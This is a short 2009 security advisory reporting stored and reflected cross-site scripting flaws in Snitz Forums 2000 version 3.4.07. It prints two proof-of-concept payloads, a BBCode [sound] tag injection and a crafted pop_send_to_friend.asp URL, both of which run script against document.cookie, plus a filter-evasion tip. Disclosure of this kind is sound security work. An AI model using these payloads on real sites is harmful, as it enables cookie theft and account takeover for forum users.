Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities

2009-10-15T00:00:00
ID SECURITYVULNS:DOC:22639
Type securityvulns
Reporter Securityvulns
Modified 2009-10-15T00:00:00

Description


Application: Snitz Forums 2000 Version affected: 3.4.07 Website: http://forum.snitz.com/ Discovered By: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Web: http://www.andreafabrizi.it Vuln: Multiple Cross-Site Scripting


PERMANENT XSS

If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u" onLoad="alert(document.cookie)[/sound]

LINK XSS

http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img src="http://www.google.it/intl/it_it/images/logo.gif" onLoad ="alert(document.cookie)">

Note the space: onLoad<space>="alert(document.cookie)"

-- Andrea Fabrizi http://www.andreafabrizi.it